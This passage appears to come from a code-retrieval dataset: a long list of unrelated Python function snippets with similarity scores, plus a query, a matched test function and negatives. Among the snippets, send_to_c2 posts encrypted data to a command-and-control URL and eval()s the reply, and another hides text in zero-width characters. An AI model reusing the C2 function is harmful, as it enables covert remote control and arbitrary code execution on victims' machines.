Detected**\\n\"\n \"Only unicode characters can be processed, but a custom Discord emoji \"\n \"was found. 
Please remove it and try again.\"\n )\n return\n\n if len(characters) > 50:\n await messages.send_denial(ctx, f\"Too many characters ({len(characters)}/50)\")\n return\n\n def get_info(char: str) -> tuple[str, str]:\n digit = f\"{ord(char):x}\"\n if len(digit) <= 4:\n u_code = f\"\\\\u{digit:>04}\"\n else:\n u_code = f\"\\\\U{digit:>08}\"\n url = f\"https://www.compart.com/en/unicode/U+{digit:>04}\"\n name = f\"[{unicodedata.name(char, '')}]({url})\"\n info = f\"`{u_code.ljust(10)}`: {name} - {utils.escape_markdown(char)}\"\n return info, u_code\n\n char_list, raw_list = zip(*(get_info(c) for c in characters), strict=True)\n embed = Embed().set_author(name=\"Character Info\")\n\n if len(characters) > 1:\n # Maximum length possible is 502 out of 1024, so there's no need to truncate.\n embed.add_field(name=\"Full Raw Text\", value=f\"`{''.join(raw_list)}`\", inline=False)\n\n await LinePaginator.paginate(char_list, ctx, embed, max_lines=10, max_size=2000, empty=False)", "def get_card_str(self, card):\n card_str = str(card)\n if card == 11:\n card_str = \"Jack\"\n if card == 12:\n card_str = \"Queen\"\n if card == 13:\n card_str = \"King\"\n if card == 1:\n card_str = \"Ace\"\n \n return card_str", "def produce_message_for_sending() -> str:\n return f\"You can donate your money here:\\n`{card_donations}`\"", "def on_text(self, char: str, game: type):", "def sendChars(self, chars):\n\t\tinputs = []\n\t\tfor ch in chars:\n\t\t\tfor direction in (0,winUser.KEYEVENTF_KEYUP): \n\t\t\t\tinput = winUser.Input()\n\t\t\t\tinput.type = winUser.INPUT_KEYBOARD\n\t\t\t\tinput.ii.ki = winUser.KeyBdInput()\n\t\t\t\tinput.ii.ki.wScan = ord(ch)\n\t\t\t\tinput.ii.ki.dwFlags = winUser.KEYEVENTF_UNICODE|direction\n\t\t\t\tinputs.append(input)\n\t\twinUser.SendInput(inputs)", "def translate_deckbox_card_name(card_name: str) -> str:\n card_name = re.sub(r' \\(.*', '', card_name)\n card_name = re.sub(r'Æ', 'Ae', card_name)\n card_name = re.sub(r'Lim-Dûl\\'s Vault', 'Lim-Dul\\'s Vault', card_name)\n return card_name", "def print_cards(cards):\r\n string = ''\r\n for c in cards:\r\n suit = c[0]\r\n if suit == 1:\r\n suit = \"\\u2665\" # heart\r\n elif suit == 2:\r\n suit = \"\\u2660\" # Spade\r\n elif suit == 3:\r\n suit = \"\\u2666\" # Diamond\r\n else:\r\n suit = \"\\u2663\" # club\r\n\r\n num = c[1]\r\n if num == 11:\r\n num = 'J'\r\n elif num == 12:\r\n num = 'Q'\r\n elif num == 13:\r\n num = 'K'\r\n else:\r\n num = str(num)\r\n\r\n string = string + num + suit + ' '\r\n return string", "async def iasip_title_card(self, ctx: Context, *, title: str) -> None:\n\n async with ctx.channel.typing():\n if not title.startswith('\"'):\n title = '\"' + title\n\n if not title.endswith('\"'):\n title += '\"'\n\n buffer = await image_utils.title_card_generator(title)\n\n try:\n await ctx.send(file=discord.File(buffer, filename=\"iasip.png\"))\n except discord.HTTPException as e:\n bot_logger.error(f'File Send Failure. {e.status}. {e.text}')\n await ctx.send(f'Could not send image. 
Details: [Status {e.status} | {e.text}]')\n return", "def non_secret_char(c):\n return c", "def print_character(name):\n character = shared_functions.find_character(name)\n if not character:\n return discord.Embed(title=\"Invalid character\")\n embed = discord.Embed(title=character[\"Name\"], description=character[\"Backstory\"],\n color=int(character[\"Color\"], 16))\n embed.add_field(name=\"**Strongness**\", value=character[\"Strongness\"])\n embed.add_field(name=\"**Smartness**\", value=character[\"Smartness\"])\n embed.add_field(name=\"**Coolness**\", value=character[\"Coolness\"])\n embed.add_field(name=\"**Health**\", value=character[\"Health\"])\n embed.add_field(name=\"**Gold**\", value=character[\"Gold\"])\n traits_field = \"\"\n for trait in character[\"Traits\"]:\n try:\n traits_field += traits.trait_dict[trait].print() + \"\\n\"\n except KeyError:\n traits_field += traits.boss_trait_dict[trait].print() + \"\\n\"\n embed.add_field(name=\"__**Traits**__\", value=traits_field)\n # TODO: Implement support in print_character for blessings that aren't unlocked.\n # None are currently implemented, so it can wait.\n if character[\"Blessing\"] in traits.blessing_dict:\n embed.add_field(name=\"__**Blessing**__\", value=traits.blessing_dict[character[\"Blessing\"]].print())\n else:\n if character[\"Blessing\"] != \"No blessing\":\n embed.add_field(name=\"__**Blessing**__\", value=\"**\" + character[\"Blessing\"] + \"**: ????\")\n inventory_string = \"\"\n for item in character[\"Inventory\"]:\n if item != \"Empty slot\":\n if name in npcs.keys():\n inventory_string += \"**Unknown item**: ???\\n\"\n else:\n item = items.item_dict[item]\n inventory_string += \"- \" + item.print() + \"\\n\"\n else:\n inventory_string += \"- Empty slot\\n\"\n embed.add_field(name=\"__**Inventory**__\", value=inventory_string)\n shared_functions.backup_characters()\n return embed", "def write(self, frame):\n super(TCPKISS, self).write(frame.encode_kiss())", "def test_repr(self):\n self.assertEqual(repr(self.card), \"A of Spades\")", "async def show_card(self, ctx, card: dict):\r\n emb = discord.Embed(\r\n title=card['name'],\r\n colour=discord.Colour.dark_purple(),\r\n url='https://roll20.net/compendium/dnd5e/Deck%20of%20Many%20Things#content',\r\n description=card['desc']\r\n )\r\n emb.set_footer(text='Use [p]domt info for list of all cards.')\r\n emb.set_image(url=card['img'])\r\n await ctx.send(embed=emb)", "def send_text_to_user(user):", "def card(phenny, input):\n if not input.group(2):\n phenny.say(input.nick + 'Perhaps you meant \".card Storm Crow\"?')\n else:\n card_name = input.group(2).strip().lower().title()\n if card_name in nick.nicknames:\n card_name = nick.nicknames[card_name]\n card_text = get_card(card_name)\n if card_text:\n phenny.reply(card_text)\n else:\n phenny.reply(\"I could not find a card by that name.\")", "def test_sendUnicodeCommand(self):\n self.p.sendCommand(\"CMD\", (\"param\\u00b9\", \"param\\u00b2\"))\n self.check(b\"CMD param\\xc2\\xb9 param\\xc2\\xb2\\r\\n\")", "def _encode_supplement(self):", "def _encode_supplement(self):", "def open_quote(self):\n self.message += '{'", "def test_post_special_characters(self):\n self.is_authenticated()\n response = self.post_special_characters()\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertEqual(response.data[\"error\"], \"You cannot post special characters\")", "def sendOTP(code):\n # Modify the code here to change from print to any output \n print(\"Your OTP is \" + code + \". 
Kindly do not share it with anyone\")", "def test_escape_semicolon(self):\n card = Card(\n \"mocking\",\n \"ˈmɑkɪŋ\",\n \"Making fun of someone or something in a cruel way; derisive.\",\n \"The ruthless scientist changed from mocking to sad.\",\n )\n\n expected = (\n \"The ruthless scientist changed from <b>mocking</b> to sad.; \"\n '\"<b>mocking /ˈmɑkɪŋ/</b><br> Making fun of someone or '\n 'something in a cruel way; derisive.\"'\n )\n\n self.assertEqual(card.to_anki_txt_format(), expected)", "def __str__(self):\n result = ''\n for c in self._cards:\n result = result + str(c) + '\\n'\n return result", "def __str__(self):\n result = ''\n for c in self._cards:\n result = result + str(c) + '\\n'\n return result", "def message(self, text):\n\n if( rpi_device ):\n self.clear()\n for char in text:\n if char == '\\n' or char == '^':\n self.cmd(0xC0) # new line\n else:\n self.cmd(ord(char),True)", "def send_string(self, code_num, msg):\n self.client.send(f\"{code_num}_{msg}\".encode())", "def write(self, frame):\n super(SerialKISS, self).write(frame.encode_kiss())", "def embed(self):\n\n # aliases\n CARDS = self.game.emojis\n U200B = self.game.u200b_ZWSP\n U3000 = self.game.u3000_IS\n U2022 = self.game.u2022_bullet\n\n # combinations\n LF = f'\\n{U200B}'\n LFLF = f'{U200B}\\n{U200B}'\n BULLET_SEP = f'{U3000}{U2022}{U3000}'\n\n # helper functions\n spacer = lambda n: f'{U200B}{U3000 * n}{U200B}'\n pad_right = lambda n: f'{U3000 * n}{U200B}'\n pad_left = lambda n: f'{U200B}{U3000 * n}'\n\n hand: BlackjackDealerHand = self.game.dealer_hand\n\n if self.game.dealer_status == 'Busted':\n title_status = ' Busted'\n else:\n title_status = \"'s Turn\"\n title = f\"{U200B}\\n**__Kaa (Dealer){title_status}__**{LF}\"\n embed = discord.Embed(\n # title=f\"**{player['name']}**{LF}\",\n title=title,\n color=self.game.embed_color,\n )\n\n # blackjack title and icon\n embed.set_author(\n name='Blackjack' + pad_right(30),\n icon_url=self.game.thumbnail_url,\n )\n\n # footer showing current player pic, and the position in queue\n text = (\n f'Phase 5: Dealer Turn{BULLET_SEP}'\n f'Game will continue momentarily'\n )\n embed.set_footer(\n icon_url=self.game.bot.user.avatar_url,\n text=text,\n )\n\n\n # dealer cards field\n name = 'Cards'\n value = ''\n card: Card\n for card in hand.iter_all():\n value += CARDS[card.format_short()]\n embed.add_field(name=name, value=value, inline=True)\n\n # blank field for formatting\n embed.add_field(\n name=U200B,\n value=U200B,\n inline=True,\n )\n\n name = 'Hard[/Best]'\n # value = f'{pad_left(1)}{hand.value_hard}'\n value = f'{hand.value_hard}'\n if hand.value_hard != hand.value:\n value += f'/{hand.value}'\n if self.game.dealer_status == 'Busted':\n value += ' (Busted)'\n value += LF # added for bottom padding\n\n embed.add_field(name=name, value=value, inline=True)\n\n\n\n\n # players\n name = 'Players'\n value = self.player_hands\n embed.add_field(name=name, value=value, inline=True)\n\n # blank field for formatting\n embed.add_field(name=U200B, value=U200B, inline=True)\n\n name = U200B\n value = self.player_values\n embed.add_field(name=name, value=value, inline=True)\n\n return embed", "def armbuy(self):\n\t\tthismsg = 
\"\\r\\n\"+self.ESC+\"12C\"+self.ESC+\"1;33m\"+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.ESC+\"0;33m\"+self.A220+self.ESC+\"1m\"+self.A220+self.A220+self.A220+self.ESC+\"0;33m\"+self.A220+self.ESC+\"1m\"+self.A220+self.ESC+\"0;33m\"+self.A220+self.A220+self.ESC+\"1m\"+self.A220+self.ESC+\"0;33m\"+self.A220+self.ESC+\"1m\"+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.ESC+\"47m\"+self.A178+self.ESC+\"40m\"+self.A223+self.ESC+\"2C\"+self.ESC+\"37m The\"+self.ESC+\"CSaga\"+self.ESC+\"Cof\"+self.ESC+\"Cthe\"+self.ESC+\"CRed\"+self.ESC+\"CDragon\"+self.ESC+\"C-\"+self.ESC+\"C\"+self.ESC+\"33mArmour\"+self.ESC+\"CList \"+self.ESC+\"2C\"+self.A220+self.ESC+\"47m\"+self.A178+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.ESC+\"47m\"+self.A178+self.A219+self.ESC+\"40m\"+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.ESC+\"0;33m\"+self.A223+self.ESC+\"1m\"+self.A223+self.A223+self.A223+self.A223+self.ESC+\"0;33m\"+self.A223+self.ESC+\"1m\"+self.A223+self.A223+self.A223+self.ESC+\"0;33m\"+self.A223+self.ESC+\"1m\"+self.A223+self.A223+self.ESC+\"0;33m\"+self.A223+self.ESC+\"1m\"+self.A223+self.ESC+\"0;33m\"+self.A223+self.A223+self.ESC+\"1m\"+self.A223+self.ESC+\"0;33m\"+self.A223+self.ESC+\"1m\"+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.ESC+\"47m\"+self.A178+self.A178+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.ESC+\"43m\"+self.A219+self.ESC+\"4C\"+self.ESC+\"40mArmour\"+self.ESC+\"25CPrice\"+self.ESC+\"8C\"+self.A219+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.ESC+\"43m\"+self.A219+self.ESC+\"2C\"+self.ESC+\"0;33m1.\"+self.ESC+\"CCoat\"+self.ESC+\"1;30m...................................\"+self.ESC+\"33m200\"+self.ESC+\"C\"+self.A219+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.ESC+\"43m\"+self.A219+self.ESC+\"2C\"+self.ESC+\"0;33m2.\"+self.ESC+\"CHeavy\"+self.ESC+\"CCoat\"+self.ESC+\"1;30m...........................\"+self.ESC+\"33m1,000\"+self.ESC+\"C\"+self.A219+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.ESC+\"43m\"+self.A219+self.ESC+\"2C\"+self.ESC+\"0;33m3.\"+self.ESC+\"CLeather\"+self.ESC+\"CVest\"+self.ESC+\"1;30m.........................\"+self.ESC+\"33m3,000\"+self.ESC+\"C\"+self.ESC+\"43m\"+self.A178+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.ESC+\"43m\"+self.A178+self.ESC+\"2C\"+self.ESC+\"0;33m4.\"+self.ESC+\"CBronze\"+self.ESC+\"CArmour\"+self.ESC+\"1;30m.......................\"+self.ESC+\"33m10,000\"+self.ESC+\"C\"+self.ESC+\"43m\"+self.A177+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.ESC+\"43m\"+self.A177+self.ESC+\"2C\"+self.ESC+\"0;33m5.\"+self.ESC+\"CIron\"+self.ESC+\"CArmour\"+self.ESC+\"1;30m.........................\"+self.ESC+\"33m30,000\"+self.ESC+\"C\"+self.ESC+\"43m\"+self.A176+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += 
self.ESC+\"12C\"+self.ESC+\"0;33m\"+self.A223+self.ESC+\"2C6.\"+self.ESC+\"CGraphite\"+self.ESC+\"CArmour\"+self.ESC+\"1;30m....................\"+self.ESC+\"33m100,000\"+self.ESC+\"C\"+self.ESC+\"0;33m\"+self.A223+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.A176+self.ESC+\"2C7.\"+self.ESC+\"CErdrick's\"+self.ESC+\"CArmour\"+self.ESC+\"1;30m...................\"+self.ESC+\"33m150,000\"+self.ESC+\"C\"+self.ESC+\"0;33m\"+self.A176+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.A177+self.ESC+\"2C8.\"+self.ESC+\"CArmour\"+self.ESC+\"Cof\"+self.ESC+\"CDeath\"+self.ESC+\"1;30m....................\"+self.ESC+\"33m200,000\"+self.ESC+\"C\"+self.ESC+\"0;33m\"+self.A177+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.A178+self.ESC+\"2C9.\"+self.ESC+\"CAble's\"+self.ESC+\"CArmour\"+self.ESC+\"1;30m......................\"+self.ESC+\"33m400,000\"+self.ESC+\"C\"+self.ESC+\"0;33m\"+self.A178+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.A219+self.ESC+\"C10.\"+self.ESC+\"CFull\"+self.ESC+\"CBody\"+self.ESC+\"CArmour\"+self.ESC+\"1;30m.................\"+self.ESC+\"33m1,000,000\"+self.ESC+\"C\"+self.ESC+\"0;33m\"+self.A219+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.A223+self.ESC+\"C11.\"+self.ESC+\"CBlood\"+self.ESC+\"CArmour\"+self.ESC+\"1;30m.....................\"+self.ESC+\"33m4,000,000\"+self.ESC+\"C\"+self.ESC+\"0;33m\"+self.A219+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.A219+self.ESC+\"C12.\"+self.ESC+\"CMagic\"+self.ESC+\"CProtection\"+self.ESC+\"1;30m................\"+self.ESC+\"33m10,000,000\"+self.ESC+\"C\"+self.ESC+\"0;33m\"+self.A220+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.A219+self.ESC+\"C13.\"+self.ESC+\"CBelar's\"+self.ESC+\"CMail\"+self.ESC+\"1;30m....................\"+self.ESC+\"33m40,000,000\"+self.ESC+\"C\"+self.ESC+\"0;33m\"+self.A219+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.A219+self.ESC+\"C14.\"+self.ESC+\"CGolden\"+self.ESC+\"CArmour\"+self.ESC+\"1;30m..................\"+self.ESC+\"33m100,000,000\"+self.ESC+\"C\"+self.ESC+\"0;33m\"+self.A219+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.A219+self.ESC+\"C15.\"+self.ESC+\"CArmour\"+self.ESC+\"COf\"+self.ESC+\"CLore\"+self.ESC+\"1;30m.................\"+self.ESC+\"33m400,000,000\"+self.ESC+\"C\"+self.ESC+\"43m\"+self.A176+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.ESC+\"43m\"+self.A176+self.ESC+\"0;33m\"+self.A219+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A178+self.A220+self.A220+self.A220+self.A176+self.A220+self.A220+self.A178+self.A220+self.ESC+\"C\"+self.A220+self.A220+self.A220+self.A220+self.A178+self.A220+self.A220+self.A220+self.ESC+\"C\"+self.A220+self.A220+self.A221+self.A220+self.A220+self.A220+self.A220+self.A178+self.A220+self.A220+self.A176+self.ESC+\"C\"+self.A220+self.A220+self.A220+self.A220+self.A178+self.A220+self.A220+self.A220+self.A220+self.A219+self.ESC+\"1;43m\"+self.A176+self.ESC+\"40m\"+self.ESC+\"0m\\r\\n\"\n\t\treturn thismsg", "def encode_message(self, **kwargs):\r\n\r\n\t\tif kwargs[\"action\"] == \"NO\":\r\n\r\n\t\t\tself.send_message(\"|%s|%s|\" % (kwargs[\"action\"], kwargs[\"selected_name\"]))\r\n\r\n\t\telif kwargs[\"action\"] in [\"ME\",\"UR\"]:\r\n\r\n\t\t\tself.send_message(\"|%s|%s|\" % (kwargs[\"action\"], kwargs[\"message\"]))\r\n\r\n\t\telif kwargs[\"action\"] == \"LA\":\r\n\r\n\t\t\tself.send_message(\"|LA|\")\r\n\r\n\t\telif message_split[0] == \"CH\":\r\n\r\n\t\t\tpass\r\n\t\t\t\r\n\t\telse:\r\n\t\t\tself._window.open_dialog(\"Impossible d'envoyer un message\",\r\n\t\t\t\t\t\t\t\t\t \"Le message suivant 
n'a pas pu être envoyé car mal encodé : {}\".format(kwargs),\r\n\t\t\t\t\t\t\t\t\t type=\"warning\")\r\n\t\t\tprint(\"Error during encoding with arguments : %s\" % kwargs)", "def absenden(self):\n\n message = self.textFeld.toPlainText()\n self.c.send(message)\n self.textFeld.clear()", "def Send_newCards(self, cards): \n serialized = [c.serialize() for c in cards]\n self.Send({\"action\": \"newCards\", \"cards\": serialized})", "def sendPDU(self, pdu):\n # this operation does not verify the contents of the DU\n self.send(pdu.getBufferString())", "def __init__(self, char_name, char_description):\r\n self.name = char_name\r\n self.description = char_description\r\n self.conversation = None\r\n self.bribe = None", "def cardholder_name(self):\n return self.__cardholder_name", "def test_contains_nonprintable_characters(self):\n result = attributeAsLDIF(b\"key\", b\"val\\xFFue\")\n self.assertEqual(result, b\"key:: %s\\n\" % encode(b\"val\\xFFue\"))", "def rock():\n typer.echo(\"🤖🤘\")", "def def_char(self, offset, data):\n self.send((\"\\x1b\\x26\\x01%c%c\\x05\") % ((offset&0xff), (offset&0xff)))\n time.sleep(0.01)\n for i in data:\n self.send((\"%c\")%i)", "def encode_text():\n print(f\"{YELLOW}[{MIDDLE_DOT}]{RESET} Enter message to encode: \", end=\"\")\n message = input()\n encoded = LEFT_TO_RIGHT_MARK\n for message_char in message:\n code = '{0}{1}'.format('0' * padding, int(str(to_base(\n ord(message_char), len(zero_space_symbols)))))\n code = code[len(code) - padding:]\n for code_char in code:\n index = int(code_char)\n encoded = encoded + zero_space_symbols[index]\n\n encoded += RIGHT_TO_LEFT_MARK\n\n pyperclip.copy(encoded)\n print(f\"{GREEN}[+]{RESET} Encoded message copied to clipboard. {GREEN}[+]{RESET}\")", "def sendPDU(self, pdu):\n # this operation does not verify the contents of the PDU\n self.send(pdu.getBufferString())", "def sndString(self, str):\r\n\t\tfor ch in str:\r\n\t\t\tself.ser.write(ch)\r\n\t\t\t# ritardo tra un invio e il successivo\r\n\t\t\tsleep(self.dlTx)\r\n\t\t# debug\r\n\t\tif self.deb:\r\n\t\t\tprint \"send:\",\r\n\t\t\tprintHex(str)", "async def fuckedd (abusehard):\n if not abusehard.text[0].isalpha() and abusehard.text[0] not in (\"/\", \"#\", \"@\", \"!\"):\n index = random.randint(0, len(memes.ABUSEHARD_STRING) - 1)\n reply_text = memes.ABUSEHARD_STRING[index]\n await abusehard.edit(reply_text)", "async def fuckedd(abusehard):\n if not abusehard.text[0].isalpha() and abusehard.text[0] not in (\n \"/\",\n \"#\",\n \"@\",\n \"!\",\n ):\n index = random.randint(0, len(ABUSEHARD_STRING) - 1)\n reply_text = ABUSEHARD_STRING[index]\n await abusehard.edit(reply_text)", "def send_to_c2(msg: str) -> str:\n msg_as_ord = [ord(c) for c in msg]\n msg_encrypted = crypt1(msg_as_ord)\n resp = requests.post(C2_URL, data=str(msg_encrypted))\n if resp.status_code != 200:\n print('Got status code', resp.status_code)\n return None\n\n raw_resp = resp._content.decode('utf-8')\n encrypted_list = eval(raw_resp)\n decrypted_list = crypt1(encrypted_list)\n return ''.join([chr(i) for i in decrypted_list])", "def barcode_message( self, ucode ):\n\t\tassert isinstance( ucode, unicode ), \"the code to compute in barcode must be a unicode string\" \n\n\t\tfor uchar in ucode:\n\t\t\tif not( uchar in self._char39 ):\n\t\t\t\traise Barcode39Error( '%s char is not listed in Barcode39 characters [0..9,A..Z,space,9,-,.,$,/,+,%]' )\n\t\n\t\treturn u'*%s*' % ucode.strip()", "async def printtext(self, ctx: discord.ext.commands.Context, *args):\n message_channel: discord.abc.Messageable = 
ctx.message.channel\n if len(args) == 1:\n received_string = args[0]\n if received_string.startswith('\"') and received_string.endswith('\"'):\n received_string = received_string[1:-1]\n pos = received_string.find(\"\\\\\")\n if pos != -1 and received_string[pos + 1] != \" \":\n print(\"Error:\" + received_string[pos + 1])\n return\n pos = received_string.find(\"\\\"\")\n if pos != -1:\n print(\"Error:\" + received_string[pos + 1])\n return\n final_string = \"\"\n number_emoji = self.botVariables.numbers_emoji\n for c in received_string:\n if c.isalnum():\n try:\n val = int(c)\n if val < 10:\n final_string += number_emoji[val] + \" \"\n else:\n print(\"fatal Error!!!-\" + str(val))\n except ValueError:\n c = c.lower()\n if c == \"è\" or c == \"é\" or c == \"à\" or c == \"ù\" or c == \"ì\":\n final_string += c + \" \"\n else:\n final_string += \":regional_indicator_\" + c + \":\" + \" \"\n else:\n if c == \"!\" or c == \"?\" or c == \"#\":\n if c == \"!\":\n final_string += \":exclamation:\" + \" \"\n else:\n if c == \"#\":\n final_string += \":hash:\" + \" \"\n else:\n final_string += \":question:\" + \" \"\n else:\n final_string += c + \" \"\n await message_channel.send(final_string)\n else:\n await message_channel.send(\n \"**Usage:** \" + self.command_prefix + \"printtext \\\"phrase\\\", for more see \"\n + self.command_prefix + \"help printtext\")", "def __str__(self):\n return f\"{self.deck}\"", "def cipher_feedback(self):", "def send_message(self, serial_message):\n #print(\"Sending message: %s\" % serial_message)\n self.sendString(serial_message)", "def characters(self, message):\n self._message = self._message + message", "def gateway(arg):\n\tassert isinstance(arg, str)\n\treturn r\"(?P<%s>[\\w_\\-@\\' \\.]+)\" % (arg,)", "async def decode(ctx, code: Option(str, \"Brainfuck code to decode into text\")):\n decoded = bot.brainfuck.decode(code)\n await send_code(ctx, decoded.text, lang=\"txt\", filename=\"text.txt\")", "async def cry(e):\n if not e.text[0].isalpha() and e.text[0] not in (\"/\", \"#\", \"@\", \"!\"):\n await e.edit(random.choice(CRI))", "def send_command(self, command):\n send_message = \"\"\n for i in command:\n send_message += chr(i)\n #send_message += bytes(i)\n\n for data in send_message:\n self.pymata.transport.write(data)", "def as_string(self):\n # Remove cards which have no definition\n cards = [card for card in self if card.definition is not None]\n # Remove cards which have no word\n cards = [card for card in cards if card.word]\n return \"\\n\".join([card.get_flashcard() for card in cards])", "def __repr__(self):\n r = '<Character id:%s[%s] name:_%s_>' % (self.characterID,\n self.accessSystem,\n self.get('name'))\n if isinstance(r, unicode): r = r.encode('utf_8', 'replace')\n return r", "def sn(self):\n\t\tstring = []\n\t\tresp = [0x00]\n\t\tself.spi.transfer([0x10], [0x00], 1)\n\t\ttime.sleep(9e-3)\n\t\tfor i in range(60):\n\t\t\tself.spi.transfer([0x00], resp, 1)\n\t\t\tstring.append(chr(resp[0]))\n\t\ttime.sleep(0.1)\n\t\treturn ''.join(string).strip()", "def test_str(self):\n character = self.character\n\n self.assertEqual(str(character), self.character_raw['name'])", "def decode(self, vcard):\n\n # pylint: disable=W0201\n self.content = vcard", "def for_description_enter_vlan_for_functional_testing_without_quotes(driver, description):\n driver.find_element_by_xpath('//input[@ix-auto=\"input__Description\"]').clear()\n driver.find_element_by_xpath('//input[@ix-auto=\"input__Description\"]').send_keys(description)", "def __str__(self):\n return 
f'({self.character})'", "def ascii_version_of_card(*cards):\n\n # we will use this to prints the appropriate icons for each card\n name_to_symbol = {\n 'Spades': '♠',\n 'Diamonds': '♦',\n 'Hearts': '♥',\n 'Clubs': '♣',\n }\n\n def card_to_string(card):\n # 10 is the only card with a 2-char rank abbreviation\n rank = card.rank if card.rank == '10' else card.rank[0]\n\n # add the individual card on a line by line basis\n return CARD.format(rank=rank, suit=name_to_symbol[card.suit])\n\n\n return join_lines(map(card_to_string, cards))", "def message(self, key):\n msg = '[ensime] ' + feedback[key]\n self.raw_message(msg)", "def escape(self):\n pass", "def __call__(self, text, defaultText='', failsafe=False, timeout=None, mode='Abc', orientation='portrait', delayBetweenPresses=None):\r\n if len(text):\r\n if self.phone.isFullBlackBox(): # input using hardcoded settings\r\n if self.blackBoxVkb == None:\r\n self.blackBoxVkb = BlackBoxVirtualKeyboard(self.phone)\r\n self.blackBoxVkb._writeBlackBox(text, mode=mode, orientation=orientation, delayBetweenPresses=delayBetweenPresses)\r\n else:\r\n self.write(text, defaultText,failsafe, timeout=timeout)\r\n else:\r\n self.phone.comment(\"Empty string given for input!\")", "def banner_ascii():\n print(\"\")\n print(f\"\\n{RED} Steganography Tool{RESET}\")\n print(f\"{RED} Made By {RESET}\")\n print(f\"{RED} Ehthe Samul Islam Laskar USN:1DS16CS712 {RESET}\")\n print(f\"{RED} B Padma USN:1DS19CS420{RESET}\")\n print(f\"{RED} Nikhil D Kanyal USN:1DS17CS731{RESET}\")\n print(f\"{YELLOW}Type 'help' to see commands{RESET}\")" ]
[ "0.6168183", "0.6085875", "0.5932747", "0.5859501", "0.55997914", "0.54294205", "0.5385542", "0.5369416", "0.53545773", "0.5346947", "0.5339747", "0.53114927", "0.52844477", "0.52821624", "0.5262677", "0.5241565", "0.52258605", "0.5219325", "0.52160716", "0.5215507", "0.5209636", "0.51984733", "0.5192304", "0.5183283", "0.51794285", "0.5176914", "0.5161202", "0.51587", "0.51341164", "0.5111776", "0.51098967", "0.51053226", "0.5091803", "0.50872815", "0.5083778", "0.507992", "0.5068954", "0.506785", "0.50611025", "0.50532246", "0.5052579", "0.50432765", "0.503638", "0.50320995", "0.5029896", "0.5026661", "0.5026469", "0.5014267", "0.50109655", "0.5010664", "0.4994271", "0.4983625", "0.4983625", "0.49743798", "0.4965721", "0.4957856", "0.4952946", "0.49489146", "0.49489146", "0.49470842", "0.4946758", "0.49449226", "0.49345046", "0.493408", "0.4930186", "0.49254015", "0.49251625", "0.4920344", "0.4917324", "0.4906297", "0.49057758", "0.49006134", "0.49005172", "0.48999548", "0.48901403", "0.48780227", "0.4869516", "0.48553362", "0.48539257", "0.48503053", "0.48478028", "0.48468176", "0.48454824", "0.48446864", "0.4844541", "0.48422736", "0.48342332", "0.4832424", "0.48312238", "0.48280278", "0.4825651", "0.48247945", "0.48245004", "0.48216912", "0.4819818", "0.48183414", "0.48178053", "0.48161492", "0.48113978", "0.4799152", "0.47977886" ]
0.0
-1
Send null value in SecureCode
def test_34(self): assert 'False' == Api.requestBlock('test-34')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def encrypt():\n\tnull = 0", "def test_mask_secret_null():\n assert utils.mask_secrets(\"\", None) == \"\"", "def null() -> SetupVal:\n return NullVal()", "def noneType(value):\r\n return ''", "def silent_none(value):\n if value is None:\n return ''\n return value", "def nulltest():", "def encode_null_term(self, input):\n return input.encode() + b'\\x00'", "def assemblyRotationAlgorithmStringNone(_cs, name, value):\n if value == \"None\":\n value = \"\"\n\n return {name: value}", "def testNoneValue(self):\n objectID = uuid4()\n user = createUser(u'username', u'password', u'User',\n u'user@example.com')\n namespace = createNamespace(user, u'name')\n tag = createTag(user, namespace, u'tag')\n self.store.add(TagValue(user.id, tag.id, objectID, None))", "def run(self, value):\r\n return '' if value is None else value", "def _decode_none(value):\n return value", "def test_get_feedback_none(self):\n result = ''\n self.xblock.credit_dict = None\n test_result = self.xblock.get_feedback_message()\n self.assertEquals(result, test_result)", "def no_payment_required(self):", "def test_request_channel_is_none(self):\n CanInfo.objects.filter(can_id=self.UUID).update(channel_name=None)\n self.assertFalse(send_rotate_to_can(self.USER, self.BIN_NUM))", "def test_serialize_none(self):\n self.assertEqual(serialize(None), 'null')", "def none(self):", "def test_user_is_none(self):\n self.assertFalse(send_rotate_to_can(None, self.BIN_NUM))", "def _nullify(self, value):\n if not str(value).strip():\n return None\n else:\n return value", "def _decode_null(bytes_data): # type: (bytes) -> any\n if len(bytes_data) != 0:\n raise ASN1SyntaxError('ASN1 syntax error')\n return None", "def honeycode(self) -> 